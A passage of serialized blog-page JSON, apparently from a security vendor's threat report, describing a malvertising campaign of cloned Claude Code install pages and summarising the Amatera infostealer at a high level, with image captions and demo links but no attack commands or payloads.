The pretext is simply the user wanting to install legit software.","installfix insight box 3",{"sys":4481,"__typename":4482,"title":4483,"arcadeDemoUrl":4484,"playText":4485},{"id":3537},"ArcadeDemo","InstallFix clickthrough demo","https://demo.arcade.software/w9lLXrpwl5E19eQMEcPb?embed","20 secs",{"sys":4487,"__typename":4488,"title":4489,"caption":4489,"layoutMode":118,"file":4490},{"id":3543},"Image","Comparison of the legit page and install commands versus a malicious clone",{"url":4491,"width":4492,"height":4493},"https://images.ctfassets.net/y1cdw1ablpvd/27TYctONO1xi4dAh0lBeYS/36d88361bbb6568410af6d95b829b4d8/image4.png",1999,588,{"sys":4495,"__typename":4488,"title":4496,"caption":4496,"layoutMode":118,"file":4497},{"id":3556},"When interacting with some of the detected pages, the user is redirected back to the legitimate site, lowering suspicion",{"url":4498,"width":4499,"height":4500},"https://images.ctfassets.net/y1cdw1ablpvd/17m5qsbzkBXFHumXDG8Kur/50d42f3c42092cba3082c4221a0857b0/image1.gif",1280,720,{"sys":4502,"__typename":4488,"title":4503,"caption":118,"layoutMode":118,"file":4504},{"id":3576},"Cloned page 1",{"url":4505,"width":4492,"height":4506},"https://images.ctfassets.net/y1cdw1ablpvd/3ymf2ZJNmWE0U09oOQktzj/74984e9a094f01df4bcb661e23d58992/image2.png",1128,{"sys":4508,"__typename":4488,"title":4509,"caption":118,"layoutMode":118,"file":4510},{"id":3582},"Cloned page lure 2",{"url":4511,"width":4492,"height":4512},"https://images.ctfassets.net/y1cdw1ablpvd/YbK5GVyftUS5G09jmdxSG/cc4c2cca40f873879d69371eab526b56/image3.png",1107,{"sys":4514,"__typename":4488,"title":4515,"caption":4516,"layoutMode":118,"file":4517},{"id":3588},"Lure 3","Google Search sponsored results for Claude Code cloned 
pages",{"url":4518,"width":4519,"height":4520},"https://images.ctfassets.net/y1cdw1ablpvd/3sLwOnpET892xdFyvBtzfn/956963620a9cec4bafd3b3a63f0426b0/image5.png",1915,903,{"sys":4522,"__typename":4428,"content":4523,"name":4563,"title":118},{"id":3594},{"json":4524},{"nodeType":1295,"data":4525,"content":4526},{},[4527],{"nodeType":1294,"data":4528,"content":4529},{},[4530,4534,4543,4547,4554,4558],{"nodeType":1293,"value":4531,"marks":4532,"data":4533},"Malvertising is an extremely prevalent distribution method ",[],{},{"nodeType":1329,"data":4535,"content":4537},{"uri":4536},"https://pushsecurity.com/blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs/",[4538],{"nodeType":1293,"value":4539,"marks":4540,"data":4542},"we've seen used extensively",[4541],{"type":1337},{},{"nodeType":1293,"value":4544,"marks":4545,"data":4546}," to distribute both phishing payloads and ClickFix-style lures (including the ",[],{},{"nodeType":1329,"data":4548,"content":4549},{"uri":1331},[4550],{"nodeType":1293,"value":1334,"marks":4551,"data":4553},[4552],{"type":1337},{},{"nodeType":1293,"value":4555,"marks":4556,"data":4557}," campaign we uncovered last year). 
",[],{},{"nodeType":1293,"value":4559,"marks":4560,"data":4562},"In fact, 4 in 5 ClickFix lures we intercept are accessed from search engines.",[4561],{"type":1444},{},"installfix insight box 1",{"sys":4565,"__typename":4566,"type":4567,"ctaText":4568,"buttonLabel":87,"buttonColour":4569,"buttonUrl":66},{"id":3639},"CtaWidget","Custom","Read more about stealthy attack delivery and techniques in our new report, analysing the different browser-based techniques behind in-the-wild breaches in 2026.","sunny orange",{"sys":4571,"__typename":4428,"content":4572,"name":4590,"title":118},{"id":3714},{"json":4573},{"nodeType":1295,"data":4574,"content":4575},{},[4576,4583],{"nodeType":1294,"data":4577,"content":4578},{},[4579],{"nodeType":1293,"value":4580,"marks":4581,"data":4582},"Amatera is a relatively new infostealer used by cybercriminals to steal sensitive data, such as browser saved passwords, cookies, session tokens, and general system information. It started appearing publicly around 2025 and is considered an evolution of an older malware family called ACR Stealer, and is sold via subscription to criminal operators.",[],{},{"nodeType":1294,"data":4584,"content":4585},{},[4586],{"nodeType":1293,"value":4587,"marks":4588,"data":4589},"The malware uses various techniques designed to bypass AV/EDR, including direct NTSockets for C2, dynamic API resolution with WoW64 Syscalls, and multi-stage infection chains with dynamic payload delivery. 
Amatera communicates with its C2 server using hardcoded IP addresses belonging to legitimate CDNs, making the traffic difficult to block without disrupting legitimate services.",[],{},"installfix insight box 2",{"sys":4592,"__typename":4428,"content":4593,"name":4632,"title":118},{"id":3727},{"json":4594},{"nodeType":1295,"data":4595,"content":4596},{},[4597],{"nodeType":1294,"data":4598,"content":4599},{},[4600,4605,4609,4617,4620,4628],{"nodeType":1293,"value":4601,"marks":4602,"data":4604},"Edit: ",[4603],{"type":1444},{},{"nodeType":1293,"value":4606,"marks":4607,"data":4608},"When investigating different domains, we found additional research that indicates a variety of similar payloads being distributed. Our primary focus here is on the scale of the campaign and the lure delivery technique rather than deep analysis of the malware itself. Check out ",[],{},{"nodeType":1329,"data":4610,"content":4612},{"uri":4611},"https://medium.com/@maurice.fielenbach/paste-with-caution-how-a-fake-claude-code-installer-drops-a-fileless-implant-via-deserialization-a85068955c0a",[4613],{"nodeType":1293,"value":4614,"marks":4615,"data":4616},"this detailed analysis for one such teardown",[],{},{"nodeType":1293,"value":1402,"marks":4618,"data":4619},[],{},{"nodeType":1329,"data":4621,"content":4623},{"uri":4622},"https://www.reddit.com/r/CyberSecurityAdvice/comments/1riq3zj/i_accidentally_ran_a_suspicious_curl_command_in/",[4624],{"nodeType":1293,"value":4625,"marks":4626,"data":4627},"this Reddit thread",[],{},{"nodeType":1293,"value":4629,"marks":4630,"data":4631}," for another example.",[],{},"installfix insight box 4",{"sys":4634,"__typename":4482,"title":4635,"arcadeDemoUrl":4636,"playText":4637},{"id":3886},"ClickFix attack evolution demo","https://demo.arcade.software/UhbkGxUUQC8xpS5z88sx?embed","2 mins","content:blog:installfix.json","json","content","blog/installfix.json","blog/installfix",1776359981610]